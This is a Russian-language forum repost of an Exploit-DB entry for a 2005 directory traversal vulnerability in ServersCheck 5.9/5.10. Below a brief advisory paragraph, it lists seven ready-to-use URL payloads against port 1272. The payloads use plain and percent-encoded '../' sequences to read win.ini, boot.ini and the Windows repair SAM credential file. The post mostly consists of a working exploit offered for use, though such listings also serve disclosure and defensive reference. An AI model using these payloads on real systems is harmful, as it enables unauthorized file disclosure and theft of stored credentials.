Exploit ServersCheck 5.9/5.10 - Directory Traversal

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
25755
Проверка EDB
  1. Пройдено
Автор
RGOD
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
N/A
Дата публикации
2005-05-30
Код:
source: https://www.securityfocus.com/bid/13810/info

ServersCheck is affected by a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage this issue to disclose arbitrary files on an affected computer in the context of the affected application. This may aid in further attacks against the underlying system. 

http://www.example.com:1272/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
http://www.example.com:1272/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini
http://www.example.com:1272/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam
http://www.example.com:1272/.../.../.../.../.../.../.../.../.../boot.ini
http://www.example.com:1272/../../ ../../../../../../../boot.ini
http://www.example.com:1272/../../../../../../../../boot.ini
http://www.example.com:1272/../../../../boot.ini
 
Источник
www.exploit-db.com

Похожие темы